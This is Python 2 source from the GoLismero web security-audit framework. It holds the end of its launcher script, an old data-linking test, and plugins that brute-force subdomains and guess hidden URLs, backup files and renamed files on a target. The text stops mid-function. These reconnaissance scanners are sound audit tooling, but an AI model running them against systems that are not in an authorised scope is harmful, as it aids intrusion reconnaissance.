hasattr(m, "__file__") and m.__file__.startswith(x)
)
}
for n in our_modules.iterkeys():
if n.startswith("golismero.") or n.startswith("plugin_"):
del sys.modules[n]
# Restart GoLismero.
# Note that after this point we need to explicitly import the classes we
# use, and make sure they're the newer versions of them. That means:
# ALWAYS USE FULLY QUALIFIED NAMES FROM HERE ON.
import golismero.api.logger
import golismero.main.testing
with golismero.main.testing.PluginTester(autoinit=False) as t:
t.orchestrator_config.ui_mode = "console"
t.orchestrator_config.verbose = cmdParams.verbose
t.orchestrator_config.color = cmdParams.color
t.init_environment(mock_audit=False)
# Call the plugin hooks.
all_plugins = sorted(
t.orchestrator.pluginManager.load_plugins().iteritems())
for plugin_id, plugin in all_plugins:
if hasattr(plugin, "update"):
if cmdParams.verbose:
golismero.api.logger.Logger.log(
"Updating plugin %r..." % plugin_id)
try:
t.run_plugin_method(plugin_id, "update")
except Exception:
golismero.api.logger.Logger.log_error(format_exc())
# Done!
if cmdParams.verbose:
golismero.api.logger.Logger.log("Update complete.")
exit(0)
# Crappy way of telling if we actually did fetch new code.
class _GitHelper(object):
def __init__(self, verbose):
self.log = []
self.verbose = verbose
def __call__(self, msg):
self.log.append(msg)
if self.verbose:
Logger.log(msg)
@property
def did_update(self):
##return True # for testing
return all("Already up-to-date." not in x for x in self.log)
#------------------------------------------------------------------------------
def command_run(parser, P, cmdParams, auditParams):
# For the SCAN command, assume targets are URLs whenever feasible.
if P.command == "SCAN":
guessed_urls = []
for target in auditParams.targets:
if not "://" in target:
guessed_urls.append("http://" + target)
auditParams.targets.extend(guessed_urls)
# For all other commands, disable the testing plugins.
else:
auditParams.plugin_load_overrides.append( (False, "testing") )
# For the IMPORT command, targets are import files.
if P.command == "IMPORT":
auditParams.imports = auditParams.targets # magic
del auditParams.targets # magic
# For the REPORT command, targets are report files.
elif P.command == "REPORT":
auditParams.reports = auditParams.targets # magic
del auditParams.targets # magic
# If we reached this point, we have an internal error!
else:
raise RuntimeError("Unsupported command: %s" % P.command)
# Expand wildcards for filenames on Windows.
# On other platforms this is not needed,
# as the shell already does it for us.
if os.path.sep == "\\":
auditParams._imports = expand_wildcards(auditParams._imports)
auditParams._reports = expand_wildcards(auditParams._reports)
try:
# Load the plugins.
manager = PluginManager()
manager.find_plugins(cmdParams)
# Sanitize the plugin arguments.
try:
if P.raw_plugin_args:
P.plugin_args = parse_plugin_args(manager, P.raw_plugin_args)
except KeyError, e:
##raise # XXX DEBUG
parser.error("error parsing plugin arguments: %s" % str(e))
# Prompt for passwords.
for plugin_id in P.plugin_args.keys():
plugin_info = manager.get_plugin_by_id(plugin_id)
target_args = P.plugin_args[plugin_id]
for key, value in target_args.items():
if not value and key in plugin_info.plugin_passwd_args:
if len(plugin_info.plugin_passwd_args) > 1:
msg = "Enter password for %s (%s): "
msg %= (plugin_info.display_name, key)
else:
msg = "Enter password for %s: "
msg %= plugin_info.display_name
target_args[key] = getpass(msg)
# Save the plugin arguments for the Orchestrator and the Audit.
cmdParams.plugin_args = P.plugin_args
auditParams.plugin_args = P.plugin_args
# Check the parameters.
cmdParams.check_params()
auditParams.check_params()
# Set the plugin arguments before loading the UI plugin.
for plugin_id, plugin_args in cmdParams.plugin_args.iteritems():
status = manager.set_plugin_args(plugin_id, plugin_args)
if status != 0: # should never happen, but just in case...
if status == 1:
msg = "Unknown plugin: %s"
elif status == 2:
msg = "Invalid arguments for plugin: %s"
else:
msg = "Error setting arguments for plugin: %s"
parser.error(msg % plugin_id)
# Load the UI plugin.
ui_plugin_id = "ui/" + cmdParams.ui_mode
ui_plugin = manager.load_plugin_by_id(ui_plugin_id)
# Show an error message if something goes wrong.
except Exception, e:
##raise # XXX DEBUG
parser.error("error loading plugins: %s" % str(e))
# Check the settings with the UI plugin.
try:
ui_plugin.check_params(cmdParams, auditParams)
except Exception, e:
##raise # XXX DEBUG
msg = str(e)
if not msg:
msg = "configuration error!"
elif msg == "No targets selected for audit.":
msg = "no targets selected for audit " \
"(did you misspell the database filename?)"
parser.error(msg)
# Launch GoLismero.
launcher.run(cmdParams, auditParams)
exit(0)
#------------------------------------------------------------------------------
def expand_wildcards(filenames):
expanded = []
for filename in filenames:
if "*" in filename or "?" in filename:
expanded.extend(glob(filename))
else:
expanded.append(filename)
return expanded
#------------------------------------------------------------------------------
if __name__ == '__main__':
main()
```
#### File: misc/old_tests/test_data.py
```python
import sys
import os
from os import path
here = path.split(path.abspath(__file__))[0]
if not here: # if it fails use cwd instead
here = path.abspath(os.getcwd())
golismero = path.join(here, "..")
thirdparty_libs = path.join(golismero, "thirdparty_libs")
if path.exists(thirdparty_libs):
sys.path.insert(0, thirdparty_libs)
sys.path.insert(0, golismero)
# Import the base data types first.
from golismero.api.data import Data
from golismero.api.data.information import Information
from golismero.api.data.resource import Resource
from golismero.api.data.vulnerability import Vulnerability
# The local data cache.
from golismero.api.data import LocalDataCache
# The mock testing environment creator.
from golismero.main.testing import PluginTester
# Helper function to load all data types.
def helper_load_data_types():
data_types = []
# Look for Python files in golismero/api/data.
api_data = path.join(golismero, "golismero", "api", "data")
api_data = path.abspath(api_data)
print "Looking for modules in: %s" % api_data
assert path.isdir(api_data)
for root, folders, files in os.walk(api_data):
for name in files:
if name.startswith("_") or not name.endswith(".py"):
continue
# Get the module name from its file path.
name = name[:-3]
name = path.join(root, name)
name = path.abspath(name)
name = name[len(api_data):]
if name.startswith(path.sep):
name = name[1:]
name = name.replace(path.sep, ".")
name = "golismero.api.data." + name
print "--> Loading %s" % name
# Load the module and extract all its data types.
module = __import__(name, globals(), locals(), ['*'])
for name in dir(module):
if name.startswith("_") or name in (
"Data",
"Information",
"Resource",
"Vulnerability",
):
continue
clazz = getattr(module, name)
if isinstance(clazz, type) and issubclass(clazz, Data) and clazz not in data_types:
print "------> Found %s" % name
data_types.append(clazz)
return data_types
# This test will make sure all data types have a correct, unique type ID.
def test_data_types_have_id():
seen_types = set()
print
print "Testing correctness of data type IDs..."
data_types = helper_load_data_types()
assert len(data_types) > 0
for clazz in data_types:
print "--> Checking %s (%s)" % (clazz.__name__, clazz.data_subtype)
assert type(clazz.data_type) == int
if issubclass(clazz, Information):
assert clazz.data_type == Data.TYPE_INFORMATION
assert clazz.data_subtype == clazz.information_type
assert type(clazz.data_subtype) == str
assert clazz.data_subtype.startswith("information/")
elif issubclass(clazz, Resource):
assert clazz.data_type == Data.TYPE_RESOURCE
assert clazz.data_subtype == clazz.resource_type
assert type(clazz.data_subtype) == str
assert clazz.data_subtype.startswith("resource/")
elif issubclass(clazz, Vulnerability):
assert clazz.data_type == Data.TYPE_VULNERABILITY
assert clazz.data_subtype == clazz.vulnerability_type
assert type(clazz.data_subtype) == str
assert clazz.data_subtype.startswith("vulnerability/")
else:
assert False, clazz # A new base data class?
assert clazz.data_subtype.endswith("/abstract") or \
clazz.data_subtype not in seen_types, clazz.data_subtype
seen_types.add(clazz.data_subtype)
print
# This test makes sure the links work properly.
def test_data_links():
with PluginTester(autoinit=False) as t:
t.audit_config.targets = ["http://www.example.com/"]
t.orchestrator_config.ui_mode = "disabled"
t.init_environment()
helper_data_links()
# The actual test, without the boilerplate.
def helper_data_links():
# Create some dummy data.
from golismero.api.data.resource.url import URL
from golismero.api.data.information.text import Text
from golismero.api.data.vulnerability.information_disclosure.url_disclosure import UrlDisclosure
d1 = URL("http://www.example.com/")
d2 = Text("some text")
d3 = UrlDisclosure(d1)
d1.add_information(d2)
# Test data_type, data_subtype, etc.
print "Testing Data type checks..."
assert d1.data_type == Data.TYPE_RESOURCE
assert d1.data_subtype == URL.data_subtype
assert d1.resource_type == d1.data_subtype
assert d2.data_type == Data.TYPE_INFORMATION
assert d2.data_subtype == Text.data_subtype
assert d2.information_type == d2.data_subtype
assert d3.data_type == Data.TYPE_VULNERABILITY
assert d3.data_subtype == UrlDisclosure.data_subtype
assert d3.vulnerability_type == d3.data_subtype
# Test validate_link_minimums().
print "Testing Data.validate_link_minimums()..."
d1.validate_link_minimums()
d2.validate_link_minimums()
d3.validate_link_minimums()
# Test the links property.
print "Testing Data.links..."
assert d1.links == {d2.identity, d3.identity}
assert d2.links == {d1.identity}
assert d3.links == {d1.identity}
# Test the get_links method.
print "Testing Data.get_links()..."
assert d1.get_links(d1.data_type) == set()
assert d1.get_links(d1.data_type, d1.resource_type) == set()
assert d1.get_links(d2.data_type) == {d2.identity}
assert d1.get_links(d2.data_type, d2.information_type) == {d2.identity}
assert d1.get_links(d3.data_type) == {d3.identity}
assert d1.get_links(d3.data_type, d3.vulnerability_type) == {d3.identity}
assert d2.get_links(d2.data_type) == set()
assert d2.get_links(d2.data_type, d2.information_type) == set()
assert d2.get_links(d1.data_type) == {d1.identity}
assert d2.get_links(d1.data_type, d1.resource_type) == {d1.identity}
assert d2.get_links(d3.data_type) == set()
assert d2.get_links(d3.data_type, d3.vulnerability_type) == set()
assert d3.get_links(d3.data_type) == set()
assert d3.get_links(d3.data_type, d3.vulnerability_type) == set()
assert d3.get_links(d1.data_type) == {d1.identity}
assert d3.get_links(d1.data_type, d1.resource_type) == {d1.identity}
assert d3.get_links(d2.data_type) == set()
assert d3.get_links(d2.data_type, d2.information_type) == set()
# Test the linked_data property.
# There should be no accesses to the database since all data is local.
print "Testing Data.linked_data..."
assert {x.identity for x in d1.linked_data} == {d2.identity, d3.identity}
assert {x.identity for x in d2.linked_data} == {d1.identity}
assert {x.identity for x in d3.linked_data} == {d1.identity}
# Test the get_linked_data() method.
# There should be no accesses to the database since all data is local.
print "Testing Data.get_linked_data()..."
assert {x.identity for x in d1.find_linked_data(d1.data_type)} == set()
assert {x.identity for x in d1.find_linked_data(d1.data_type, d1.resource_type)} == set()
assert {x.identity for x in d1.find_linked_data(d2.data_type)} == {d2.identity}
assert {x.identity for x in d1.find_linked_data(d2.data_type, d2.information_type)} == {d2.identity}
assert {x.identity for x in d1.find_linked_data(d3.data_type)} == {d3.identity}
assert {x.identity for x in d1.find_linked_data(d3.data_type, d3.vulnerability_type)} == {d3.identity}
assert {x.identity for x in d2.find_linked_data(d2.data_type)} == set()
assert {x.identity for x in d2.find_linked_data(d2.data_type, d2.information_type)} == set()
assert {x.identity for x in d2.find_linked_data(d1.data_type)} == {d1.identity}
assert {x.identity for x in d2.find_linked_data(d1.data_type, d1.resource_type)} == {d1.identity}
assert {x.identity for x in d2.find_linked_data(d3.data_type)} == set()
assert {x.identity for x in d2.find_linked_data(d3.data_type, d3.vulnerability_type)} == set()
assert {x.identity for x in d3.find_linked_data(d3.data_type)} == set()
assert {x.identity for x in d3.find_linked_data(d3.data_type, d3.vulnerability_type)} == set()
assert {x.identity for x in d3.find_linked_data(d1.data_type)} == {d1.identity}
assert {x.identity for x in d3.find_linked_data(d1.data_type, d1.resource_type)} == {d1.identity}
assert {x.identity for x in d3.find_linked_data(d2.data_type)} == set()
assert {x.identity for x in d3.find_linked_data(d2.data_type, d2.information_type)} == set()
# Test the associated_* properties.
# There should be no accesses to the database since all data is local.
print "Testing Data.associated_*..."
assert {x.identity for x in d1.associated_resources} == set()
assert {x.identity for x in d1.associated_informations} == {d2.identity}
assert {x.identity for x in d1.associated_vulnerabilities} == {d3.identity}
assert {x.identity for x in d2.associated_informations} == set()
assert {x.identity for x in d2.associated_resources} == {d1.identity}
assert {x.identity for x in d2.associated_vulnerabilities} == set()
assert {x.identity for x in d3.associated_vulnerabilities} == set()
assert {x.identity for x in d3.associated_resources} == {d1.identity}
assert {x.identity for x in d3.associated_informations} == set()
# Test the get_associated_*_by_category() methods.
# There should be no accesses to the database since all data is local.
print "Testing Data.get_associated_*_by_category()..."
assert {x.identity for x in d1.get_associated_resources_by_category(d1.resource_type)} == set()
assert {x.identity for x in d1.get_associated_informations_by_category(d2.information_type)} == {d2.identity}
assert {x.identity for x in d1.get_associated_vulnerabilities_by_category(d3.vulnerability_type)} == {d3.identity}
assert {x.identity for x in d2.get_associated_informations_by_category(d2.information_type)} == set()
assert {x.identity for x in d2.get_associated_resources_by_category(d1.resource_type)} == {d1.identity}
assert {x.identity for x in d2.get_associated_vulnerabilities_by_category(d3.vulnerability_type)} == set()
assert {x.identity for x in d3.get_associated_vulnerabilities_by_category(d3.vulnerability_type)} == set()
assert {x.identity for x in d3.get_associated_resources_by_category(d1.resource_type)} == {d1.identity}
assert {x.identity for x in d3.get_associated_informations_by_category(d2.information_type)} == set()
# Test TempDataStorage.on_finish().
print "Testing LocalDataCache.on_finish() on ideal conditions..."
result = LocalDataCache.on_finish([d2, d3], d1)
assert set(result) == set([d1, d2, d3])
d1.validate_link_minimums()
d2.validate_link_minimums()
d3.validate_link_minimums()
assert d1.links == {d2.identity, d3.identity}
assert d2.links == {d1.identity}
assert d3.links == {d1.identity}
assert d1.get_links(d1.data_type) == set()
assert d1.get_links(d1.data_type, d1.resource_type) == set()
assert d1.get_links(d2.data_type) == {d2.identity}
assert d1.get_links(d2.data_type, d2.information_type) == {d2.identity}
assert d1.get_links(d3.data_type) == {d3.identity}
assert d1.get_links(d3.data_type, d3.vulnerability_type) == {d3.identity}
assert d2.get_links(d2.data_type) == set()
assert d2.get_links(d2.data_type, d2.information_type) == set()
assert d2.get_links(d1.data_type) == {d1.identity}
assert d2.get_links(d1.data_type, d1.resource_type) == {d1.identity}
assert d2.get_links(d3.data_type) == set()
assert d2.get_links(d3.data_type, d3.vulnerability_type) == set()
assert d3.get_links(d3.data_type) == set()
assert d3.get_links(d3.data_type, d3.vulnerability_type) == set()
assert d3.get_links(d1.data_type) == {d1.identity}
assert d3.get_links(d1.data_type, d1.resource_type) == {d1.identity}
assert d3.get_links(d2.data_type) == set()
assert d3.get_links(d2.data_type, d2.information_type) == set()
# XXX TODO: more tests!!!
# Run all tests from the command line.
if __name__ == "__main__":
test_data_types_have_id()
test_data_links()
```
#### File: testing/scan/brute_dns.py
```python
Golismero project site: http://golismero-project.com
Golismero project mail: <EMAIL>
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""
from golismero.api.config import Config
from golismero.api.data.resource.domain import Domain
from golismero.api.text.text_utils import generate_random_string
from golismero.api.logger import Logger
from golismero.api.net.dns import DNS
from golismero.api.plugin import TestingPlugin
from golismero.api.text.wordlist import WordListLoader, WordlistNotFound
from golismero.api.data.vulnerability.information_disclosure.domain_disclosure import DomainDisclosure
#------------------------------------------------------------------------------
class DNSBruteforcer(TestingPlugin):
#--------------------------------------------------------------------------
def get_accepted_types(self):
return [Domain]
#--------------------------------------------------------------------------
def run(self, info):
# Get the root domain only.
root = info.root
# Skip localhost.
if root == "localhost":
return
# Skip root domains we've already processed.
if self.state.put(root, True):
return
# Load the subdomains wordlist.
try:
wordlist = WordListLoader.get_wordlist_as_list(Config.plugin_args["wordlist"])
except WordlistNotFound:
Logger.log_error_verbose("Wordlist '%s' not found.." % Config.plugin_args["wordlist"])
return
except TypeError:
Logger.log_error_verbose("Wordlist '%s' is not a file." % Config.plugin_args["wordlist"])
return
# Load the subdomains whitelist.
try:
whitelist = WordListLoader.get_wordlist_as_list(Config.plugin_config["wordlist"])
except WordlistNotFound:
Logger.log_error_verbose("Wordlist '%s' not found.." % Config.plugin_config["wordlist"])
return
except TypeError:
Logger.log_error_verbose("Wordlist '%s' is not a file." % Config.plugin_config["wordlist"])
return
#
# Set a base line for dinamyc sub-domains
#
m_virtual_domains = []
for v in (generate_random_string(40) for x in xrange(3)):
l_subdomain = ".".join((v, root))
records = DNS.get_a(l_subdomain, also_CNAME=True)
for rec in records:
if rec.type == "CNAME":
m_virtual_domains.append(rec.target)
# If 3 subdomains are the same, set the base domain
m_base_domain = None
if len(set(m_virtual_domains)) == 1:
m_base_domain = m_virtual_domains[0]
# Configure the progress notifier.
self.progress.set_total(len(wordlist))
self.progress.min_delta = 1 # notify every 1%
# For each subdomain in the wordlist...
found = 0
results = []
visited = set()
for prefix in wordlist:
# Mark as completed before actually trying.
# We can't put this at the end of the loop where it belongs,
# because the "continue" statements would skip over this too.
self.progress.add_completed()
# Build the domain name.
name = ".".join((prefix, root))
# Skip if out of scope.
if name not in Config.audit_scope:
continue
# Resolve the subdomain.
records = DNS.get_a(name, also_CNAME=True)
records.extend( DNS.get_aaaa(name, also_CNAME=True) )
# If no DNS records were found, skip.
if not records:
continue
# If CNAME is the base domain, skip
chk = [True for x in records if x.type == "CNAME" and x.target == m_base_domain]
if len(chk) > 0 and all(chk):
continue
# We found a subdomain!
found += 1
Logger.log_more_verbose(
"Subdomain found: %s" % name)
# Create the Domain object for the subdomain.
domain = Domain(name)
results.append(domain)
#
# Check for Domain disclosure
#
if prefix not in whitelist:
d = DomainDisclosure(domain,
risk = 0,
level = "low",
title = "Possible subdomain leak",
description = "A subdomain was discovered which may be an unwanted information disclosure."
)
results.append(d)
# For each DNs record, grab the address or name.
# Skip duplicated records.
for rec in records:
if rec.type == "CNAME":
location = rec.target
elif rec.type in ("A", "AAAA"):
location = rec.address
else: # should not happen...
results.append(rec)
domain.add_information(rec)
continue
if location not in visited:
visited.add(location)
results.append(rec)
domain.add_information(rec)
# Log the results.
if found:
Logger.log(
"Found %d subdomains for root domain: %s"
% (found, root))
else:
Logger.log_verbose(
"No subdomains found for root domain: %s" % root)
# Return the results.
return results
```
#### File: testing/scan/brute_url.py
```python
Golismero project site: http://golismero-project.com
Golismero project mail: <EMAIL>
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""
from golismero.api.config import Config
from golismero.api.data import discard_data
from golismero.api.data.information.fingerprint import WebServerFingerprint
from golismero.api.data.resource.url import FolderURL, URL
from golismero.api.data.vulnerability.information_disclosure.url_disclosure import UrlDisclosure
from golismero.api.logger import Logger
from golismero.api.net.http import HTTP
from golismero.api.net.web_utils import ParsedURL, urljoin, get_error_page
from golismero.api.text.matching_analyzer import MatchingAnalyzer, get_diff_ratio
from golismero.api.text.wordlist import WordListLoader
from golismero.api.plugin import TestingPlugin
from functools import partial
__doc__ = """
.. note:
Acknowledgments:
We'd like to thank @capi_x for his idea on how
to detect fake 200 responses from servers by
issuing known good and bad queries and diffing
them to calculate the deviation.
https://twitter.com/capi_x
"""
#------------------------------------------------------------------------------
# Impact vectors. Available values: 0 - 4.
severity_vectors = {
"suffixes" : 4,
"prefixes" : 3,
"file_extensions": 3,
"permutations" : 3,
"predictables": 4,
"directories": 2
}
#------------------------------------------------------------------------------
class PredictablesDisclosureBruteforcer(TestingPlugin):
#--------------------------------------------------------------------------
def get_accepted_types(self):
return [FolderURL]
#--------------------------------------------------------------------------
def run(self, info):
m_url = info.url
Logger.log_more_verbose("Start to process URL: %r" % m_url)
# Server specified by param?
webserver_finger = Config.plugin_args.get("server_banner", None)
if webserver_finger:
server_canonical_name = webserver_finger
servers_related = [] # Set with related web servers
else:
# User fingerprint info
webserver_finger = info.get_associated_informations_by_category(WebServerFingerprint.information_type)
if webserver_finger:
webserver_finger = webserver_finger.pop()
server_canonical_name = webserver_finger.canonical_name
servers_related = webserver_finger.related # Set with related web servers
wordlist = set()
# Common wordlists
try:
w = Config.plugin_extra_config["common"]
wordlist.update([l_w for l_w in w.itervalues()])
except KeyError:
Logger.log_error("Can't load common wordlists")
# There is fingerprinting information?
if webserver_finger:
#
# Load wordlists
#
wordlist_update = wordlist.update
# Wordlist of server name
try:
w = Config.plugin_extra_config["%s_predictables" % server_canonical_name]
wordlist_update([l_w for l_w in w.itervalues()])
except KeyError:
Logger.log_error("Can't load predictables wordlists for server: '%s'." % server_canonical_name)
# Wordlist of related with the server found
try:
for l_servers_related in servers_related:
w = Config.plugin_extra_config["%s_predictables" % l_servers_related]
wordlist_update([l_w for l_w in w.itervalues()])
except KeyError, e:
Logger.log_error("Can't load wordlists predictables wordlists for related webserver: '%s'" % e)
# Load content of wordlists
urls = set()
m_urls_update = urls.add
for l_w in wordlist:
# Use a copy of wordlist to avoid modify the original source
l_loaded_wordlist = WordListLoader.get_wordlist_as_list(l_w)
for l_wo in l_loaded_wordlist:
try:
l_wo = l_wo[1:] if l_wo.startswith("/") else l_wo
tmp_u = urljoin(m_url, l_wo)
except ValueError, e:
Logger.log_error("Failed to parse key, from wordlist, '%s'" % tmp_u)
continue
m_urls_update(tmp_u)
Logger.log_verbose("Loaded %s URLs to test." % len(urls))
# Generates the error page
error_response = get_error_page(m_url)
# Create the matching analyzer
try:
store_info = MatchingAnalyzer(error_response.raw_data, min_ratio=0.65)
except ValueError, e:
Logger.log_error("There is not information for analyze when creating the matcher: '%s'" % e)
return
# Create the partial funs
_f = partial(process_url,
severity_vectors['predictables'],
get_http_method(m_url),
store_info,
self.update_status,
len(urls))
# Process the URLs
for i, l_url in enumerate(urls):
_f((i, l_url))
# Generate and return the results.
return generate_results(store_info.unique_texts)
#------------------------------------------------------------------------------
class SuffixesDisclosureBruteforcer(TestingPlugin):
"""
Testing suffixes: index.php -> index_0.php
"""
#--------------------------------------------------------------------------
def get_accepted_types(self):
return [URL]
#--------------------------------------------------------------------------
def run(self, info):
# Parse original URL
m_url = info.url
m_url_parts = info.parsed_url
# If file is a javascript, css or image, do not run
if info.parsed_url.extension[1:] in ('css', 'js', 'jpeg', 'jpg', 'png', 'gif', 'svg') or not m_url_parts.extension:
Logger.log_more_verbose("Skipping URL: %s" % m_url)
return
Logger.log_more_verbose("Bruteforcing URL: %s" % m_url)
#
# Load wordlist for suffixes: index.php -> index_0.php
#
# COMMON
m_urls = make_url_with_suffixes(get_list_from_wordlist("common_suffixes"), m_url_parts)
# Generates the error page
m_error_response = get_error_page(m_url)
# Create the matching analyzer
try:
m_store_info = MatchingAnalyzer(m_error_response.raw_data, min_ratio=0.65)
except ValueError, e:
Logger.log_error("There is not information for analyze when creating the matcher: '%s'" % e)
return
# Create the partial funs
_f = partial(process_url,
severity_vectors['suffixes'],
get_http_method(m_url),
m_store_info,
self.update_status,
len(m_urls))
# Process the URLs
for i, l_url in enumerate(m_urls):
_f((i, l_url))
# Generate and return the results.
return generate_results(m_store_info.unique_texts)
#------------------------------------------------------------------------------
class PrefixesDisclosureBruteforcer(TestingPlugin):
"""
Testing changing extension of files
"""
#--------------------------------------------------------------------------
def get_accepted_types(self):
return [URL]
#--------------------------------------------------------------------------
def run(self, info):
# Parse original URL
m_url = info.url
m_url_parts = info.parsed_url
# If file is a javascript, css or image, do not run
if info.parsed_url.extension[1:] in ('css', 'js', 'jpeg', 'jpg', 'png', 'gif', 'svg') or not m_url_parts.extension:
Logger.log_more_verbose("Skipping URL: %s" % m_url)
return
Logger.log_more_verbose("Bruteforcing URL: %s" % m_url)
#
# Load wordlist for prefixes
#
# COMMON
m_urls = make_url_with_prefixes(get_list_from_wordlist("common_prefixes"), m_url_parts)
# Generates the error page
m_error_response = get_error_page(m_url)
# Create the matching analyzer
try:
m_store_info = MatchingAnalyzer(m_error_response.raw_data, min_ratio=0.65)
except ValueError, e:
Logger.log_error("There is not information for analyze when creating the matcher: '%s'" % e)
return
# Create the partial funs
_f = partial(process_url,
severity_vectors['prefixes'],
get_http_method(m_url),
m_store_info,
self.update_status,
len(m_urls))
# Process the URLs
for i, l_url in enumerate(m_urls):
_f((i, l_url))
# Generate and return the results.
return generate_results(m_store_info.unique_texts)
#------------------------------------------------------------------------------
class FileExtensionsDisclosureBruteforcer(TestingPlugin):
"""
Testing changing extension of files
"""
#--------------------------------------------------------------------------
def get_accepted_types(self):
return [URL]
#--------------------------------------------------------------------------
def run(self, info):
# Parse original URL
m_url = info.url
m_url_parts = info.parsed_url
# If file is a javascript, css or image, do not run
if info.parsed_url.extension[1:] in ('css', 'js', 'jpeg', 'jpg', 'png', 'gif', 'svg') or not m_url_parts.extension:
Logger.log_more_verbose("Skipping URL: %s" % m_url)
return
Logger.log_more_verbose("Start to process URL: %s" % m_url)
#
# Load wordlist for changing extension of files
#
# COMMON
m_urls = make_url_changing_extensions(get_list_from_wordlist("common_extensions"), m_url_parts)
# Generates the error page
m_error_response = get_error_page(m_url)
# Create the matching analyzer
try:
m_store_info = MatchingAnalyzer(m_error_response.raw_data, min_ratio=0.65)
except ValueError, e:
Logger.log_error("There is not enough information to analyze when creating the matcher: '%s'" % e)
return
# Create the partial funs
_f = partial(process_url,
severity_vectors['file_extensions'],
get_http_method(m_url),
m_store_info,
self.update_status,
len(m_urls))
# Process the URLs
for i, l_url in enumerate(m_urls):
_f((i, l_url))
# Generate and return the results.
return generate_results(m_store_info.unique_texts)
#------------------------------------------------------------------------------
class PermutationsDisclosureBruteforcer(TestingPlugin):
"""
Testing filename permutations
"""
#--------------------------------------------------------------------------
def get_accepted_types(self):
return [URL]
#--------------------------------------------------------------------------
def run(self, info):
# Parse original URL
m_url = info.url
m_url_parts = info.parsed_url
# If file is a javascript, css or image, do not run
if info.parsed_url.extension[1:] in ('css', 'js', 'jpeg', 'jpg', 'png', 'gif', 'svg') or not m_url_parts.extension:
Logger.log_more_verbose("Skipping URL: %s" % m_url)
return
Logger.log_more_verbose("Bruteforcing URL: '%s'" % m_url)
#
# Load wordlist for permutations
#
# COMMON
m_urls = make_url_mutate_filename(m_url_parts)
# Generates the error page
m_error_response = get_error_page(m_url)
# Create the matching analyzer
try:
m_store_info = MatchingAnalyzer(m_error_response.raw_data, min_ratio=0.65)
except ValueError, e:
Logger.log_error("There is not information for analyze when creating the matcher: '%s'" % e)
return
# Create the partial funs
_f = partial(process_url,
severity_vectors['permutations'],
get_http_method(m_url),
m_store_info,
self.update_status,
len(m_urls))
# Process the URLs
for i, l_url in enumerate(m_urls):
_f((i, l_url))
# Generate and return the results.
return generate_results(m_store_info.unique_texts)
#------------------------------------------------------------------------------
class DirectoriesDisclosureBruteforcer(TestingPlugin):
"""
Testing changing directories of files
"""
#--------------------------------------------------------------------------
def get_accepted_types(self):
return [URL]
#--------------------------------------------------------------------------
def run(self, info):
# Parse original URL
m_url = info.url
m_url_parts = info.parsed_url
# If file is a javascript, css or image, do not run
if info.parsed_url.extension[1:] in ('css', 'js', 'jpeg', 'jpg', 'png', 'gif', 'svg') or not m_url_parts.extension:
Logger.log_more_verbose("Skipping URL: %s" % m_url)
return
Logger.log_more_verbose("Bruteforcing URL: %s" % m_url)
#
# Load wordlist for changing directories
#
# COMMON
m_urls = make_url_changing_folder_name(m_url_parts)
# Generates the error page
m_error_response = get_error_page(m_url)
# Create the matching analyzer
try:
m_store_info = MatchingAnalyzer(m_error_response.raw_data, min_ratio=0.65)
except ValueError, e:
Logger.log_error("There is not information for analyze when creating the matcher: '%s'" % e)
return
# Create the partial funs
_f = partial(process_url,
severity_vectors['directories'],
get_http_method(m_url),
m_store_info,
self.update_status,
len(m_urls))
# Process the URLs
for i, l_url in enumerate(m_urls):
_f((i, l_url))
# Generate and return the results.
return generate_results(m_store_info.unique_texts)
#------------------------------------------------------------------------------
def process_url(risk_level, method, matcher, updater_func, total_urls, url):
"""
Checks if an URL exits.
:param risk_level: risk level of the tested URL, if discovered.
:type risk_level: int
:param method: string with HTTP method used.
:type method: str
:param matcher: instance of MatchingAnalyzer object.
:type matcher: `MatchingAnalyzer`
:param updater_func: update_status function to send updates
:type updater_func: update_status
:param total_urls: total number of URL to globally process.
:type total_urls: int
:param url: a tuple with data: (index, the URL to process)
:type url: tuple(int, str)
"""
i, url = url
updater_func((float(i) * 100.0) / float(total_urls))
# Logger.log_more_verbose("Trying to discover URL %s" % url)
# Get URL
p = None
try:
p = HTTP.get_url(url, use_cache=False, method=method)
if p:
discard_data(p)
except Exception, e:
Logger.log_error_more_verbose("Error while processing: '%s': %s" % (url, str(e)))
# Check if the url is acceptable by comparing
# the result content.
#
# If the maching level between the error page
# and this url is greater than 52%, then it's
# the same URL and must be discarded.
#
if p and p.status == "200":
# If the method used to get URL was HEAD, get complete URL
if method != "GET":
try:
p = HTTP.get_url(url, use_cache=False, method="GET")
if p:
discard_data(p)
except Exception, e:
Logger.log_error_more_verbose("Error while processing: '%s': %s" % (url, str(e)))
# Append for analyze and display info if is accepted
if matcher.analyze(p.raw_response, url=url, risk=risk_level):
Logger.log_more_verbose("Discovered partial url: '%s'" % url)
#------------------------------------------------------------------------------
#
# Aux functions
#
#------------------------------------------------------------------------------
def load_wordlists(wordlists):
"""
Load the with names pased as parameter.
This function receives a list of names of wordlist, defined in plugin
configuration file, and return a dict with instances of wordlists.
:param wordlists: list with wordlists names
:type wordlists: list
:returns: A dict with wordlists
:rtype: dict
"""
m_tmp_wordlist = {}
# Get wordlist to load
for l_w in wordlists:
for wordlist_family, l_wordlists in Config.plugin_extra_config.iteritems():
if wordlist_family.lower() in l_w.lower():
m_tmp_wordlist[l_w] = l_wordlists
# Load the wordlist
m_return = {}
for k, w_paths in m_tmp_wordlist.iteritems():
m_return[k] = [WordListLoader.get_wordlist_as_list(w) for w in w_paths]
return m_return
#------------------------------------------------------------------------------
def get_http_method(url):
"""
This function determinates if the method HEAD is available. To do that, compare between two responses:
- One with GET method
- One with HEAD method
If both are seem more than 90%, the response are the same and HEAD method are not allowed.
"""
m_head_response = HTTP.get_url(url, method="HEAD") # FIXME handle exceptions!
